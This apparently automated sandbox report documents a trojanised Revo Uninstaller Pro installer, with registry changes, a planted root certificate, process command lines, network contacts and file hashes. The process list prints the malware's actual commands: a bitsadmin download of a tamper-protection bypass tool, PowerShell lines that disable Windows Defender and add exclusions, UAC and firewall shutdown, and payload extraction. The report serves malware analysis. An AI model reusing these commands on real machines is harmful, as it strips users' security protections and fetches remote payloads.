| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version\ = "5.1" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RUExt.DLL | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe" | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp" /SL5="$50150,18996440,788992,C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs"
C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat" "
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$30186,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\rundll32.exe
"rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
C:\Windows\system32\runonce.exe
"C:\Windows\system32\runonce.exe" -r
C:\Windows\System32\grpconv.exe
"C:\Windows\System32\grpconv.exe" -o
C:\Windows\system32\regsvr32.exe
"regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\main.bat" "
C:\Windows\SysWOW64\mode.com
mode 65,10
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat" "
C:\ProgramData\uzlyLtM20yixSdV\7z.exe
7z.exe e file.zip -p___________5028pwd2533pwd24016___________ -oextracted
C:\Windows\SysWOW64\timeout.exe
timeout /T 180 /NOBREAK
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
C:\ProgramData\uzlyLtM20yixSdV\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\ProgramData\uzlyLtM20yixSdV\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\ProgramData\uzlyLtM20yixSdV\111.exe
"111.exe"
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe
C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
C:\ProgramData\uzlyLtM20yixSdV\111.exe
"C:\ProgramData\uzlyLtM20yixSdV\111.exe"
C:\ProgramData\uzlyLtM20yixSdV\111.exe
"C:\ProgramData\uzlyLtM20yixSdV\111.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | telete.in | udp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
Files
memory/1924-0-0x0000000000400000-0x00000000004CE000-memory.dmp
memory/1924-2-0x0000000000401000-0x00000000004A9000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
| MD5 | d0e24e6d7017127bea02bb0160229bee |
| SHA1 | 34350e5b7f268797b2a7ec56390c2228f841b37b |
| SHA256 | ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994 |
| SHA512 | f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86 |
memory/2712-12-0x0000000000400000-0x0000000000689000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-CFOUU.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs
| MD5 | c84933bcccf41369ef9ecce015b86ed0 |
| SHA1 | 624713276ae217d8d05c03598eecd31209c7f77a |
| SHA256 | ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679 |
| SHA512 | 221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363 |
\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
| MD5 | dc21d689cfa1860e8820ed0ee45b1f2a |
| SHA1 | acf2db6df76114601a2e58097629e0c8cbce129b |
| SHA256 | 01732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c |
| SHA512 | a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140 |
memory/2840-36-0x0000000000400000-0x0000000000429000-memory.dmp
C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat
| MD5 | b0a7842dd51df8942bc8b837282d1c2b |
| SHA1 | 0e9432597657c28ca9ac766ac7bf0a903d6aeb3b |
| SHA256 | 4a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8 |
| SHA512 | b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6 |
\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
| MD5 | 74f1186a6d3bc01716681712c6b24a74 |
| SHA1 | 9c015d4a4d4a9c7ee4619ea2e2068143c3b81e18 |
| SHA256 | d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d |
| SHA512 | bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0 |
memory/2712-48-0x0000000000400000-0x0000000000689000-memory.dmp
memory/1924-50-0x0000000000400000-0x00000000004CE000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\iswin7logo.dll
| MD5 | 1ea948aad25ddd347d9b80bef6df9779 |
| SHA1 | 0be971e67a6c3b1297e572d97c14f74b05dafed3 |
| SHA256 | 30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488 |
| SHA512 | f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545 |
memory/2336-62-0x00000000746E0000-0x00000000746FB000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\b2p.dll
| MD5 | ab35386487b343e3e82dbd2671ff9dab |
| SHA1 | 03591d07aea3309b631a7d3a6e20a92653e199b8 |
| SHA256 | c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2 |
| SHA512 | b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09 |
memory/2336-79-0x00000000744D0000-0x00000000744E1000-memory.dmp
memory/2336-81-0x0000000001E00000-0x0000000001E0F000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\botva2.dll
| MD5 | 67965a5957a61867d661f05ae1f4773e |
| SHA1 | f14c0a4f154dc685bb7c65b2d804a02a0fb2360d |
| SHA256 | 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105 |
| SHA512 | c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 2aa2713f855ff114ac2fdaaf8e7acfe5 |
| SHA1 | 1da6223cc9d34b572213d4e6ab3990efba5f4b36 |
| SHA256 | 82585b756e0cf581f621aff8a299afad83d3595eabcadae3b32fdd4e3c125836 |
| SHA512 | 72b29461c19c01e8a6fd0f8274b965733f94f758fe7907251160353fc4f1694f4ffdc0eb59067cc1791145e448f5f8cfd039f342b752db5d91385f658446f64b |
memory/2336-138-0x0000000001E00000-0x0000000001E0F000-memory.dmp
memory/2336-137-0x00000000744D0000-0x00000000744E1000-memory.dmp
memory/2336-136-0x00000000746E0000-0x00000000746FB000-memory.dmp
memory/2336-135-0x0000000000400000-0x0000000000509000-memory.dmp
memory/2840-134-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2336-174-0x0000000000400000-0x0000000000509000-memory.dmp
\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
| MD5 | ddb041550a3e69764cd9d7d3de3636f3 |
| SHA1 | 1ad9b13a6627c1e6f258951965e39ba9cfd9cb1c |
| SHA256 | 54e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975 |
| SHA512 | 00498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800 |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
| MD5 | edc78deb34de240c787b1011161e9a4e |
| SHA1 | 2d31275530dce33d3bc329991c8ad59e1b303577 |
| SHA256 | 69569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b |
| SHA512 | e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b |
C:\Windows\System32\drivers\revoflt.sys
| MD5 | 498c3d4d44382a96812a0e0ff28d575b |
| SHA1 | c34586b789ca5fe4336ab23ad6ff6eeb991c9612 |
| SHA256 | 23cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba |
| SHA512 | ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1 |
memory/2336-319-0x00000000746E0000-0x00000000746FB000-memory.dmp
memory/2336-318-0x0000000000400000-0x0000000000509000-memory.dmp
\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
| MD5 | 75d7bf3468669a6c3df6f4d048315128 |
| SHA1 | 678d3b531738573520367b47c0cd52cf5e431fa0 |
| SHA256 | 927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae |
| SHA512 | 9c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e |
C:\ProgramData\uzlyLtM20yixSdV\main.bat
| MD5 | 1376349b5831fe5760106870cd5bad6d |
| SHA1 | cf6ff2d17e597893a61fedfd4fe90748ab2349e1 |
| SHA256 | 67fc2976cfc997cc5d0e74a45ba3fe44c486e3f57e92a9b77cfd4d55199c1872 |
| SHA512 | 64af4f7e513b6e860757293f0dd92100f17121f10d9c75c72c8ff9bea1144eda55c62be6b16a158b513828cdc3e3c5a355382062d975673617f020a5e10d99b8 |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
| MD5 | 1dd8459f2595e4c0603ad491590f6952 |
| SHA1 | 607efe3c74388fb1e4b19f8f7ed2520ebfc349a1 |
| SHA256 | 5bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d |
| SHA512 | c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d |
C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat
| MD5 | 308ba58a50ffa9eabd31fdba79af6dd1 |
| SHA1 | 29c09164facb6419f9d7f9e103f7e13bed4743a1 |
| SHA256 | 0ef02b5ebb5f59c70722fc29651ad48a49b2b4d87f33416b1b06c8a038475243 |
| SHA512 | 674edfeacf8c6e606a80187f95dc16abcc0804f18c2b2e81734cf4f7e6d1f68e9db5827f18107c0882506aba47485665471c37acd2b9ad50ca075eb083a9582f |
memory/1876-333-0x0000000000400000-0x0000000000E32000-memory.dmp
C:\ProgramData\uzlyLtM20yixSdV\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
memory/2228-343-0x0000000000130000-0x000000000025E000-memory.dmp
memory/2228-347-0x00000000004D0000-0x00000000004EA000-memory.dmp
memory/2840-362-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2336-361-0x0000000000400000-0x0000000000509000-memory.dmp
memory/2820-363-0x0000000000400000-0x0000000000E32000-memory.dmp
memory/2228-368-0x0000000005970000-0x0000000005A60000-memory.dmp
memory/2228-369-0x00000000055C0000-0x0000000005658000-memory.dmp
memory/2988-372-0x0000000000400000-0x0000000000495000-memory.dmp
memory/2988-381-0x0000000000400000-0x0000000000495000-memory.dmp
memory/2988-382-0x0000000000400000-0x0000000000495000-memory.dmp
memory/2988-380-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2988-378-0x0000000000400000-0x0000000000495000-memory.dmp
memory/2988-376-0x0000000000400000-0x0000000000495000-memory.dmp
memory/2988-374-0x0000000000400000-0x0000000000495000-memory.dmp
memory/2988-370-0x0000000000400000-0x0000000000495000-memory.dmp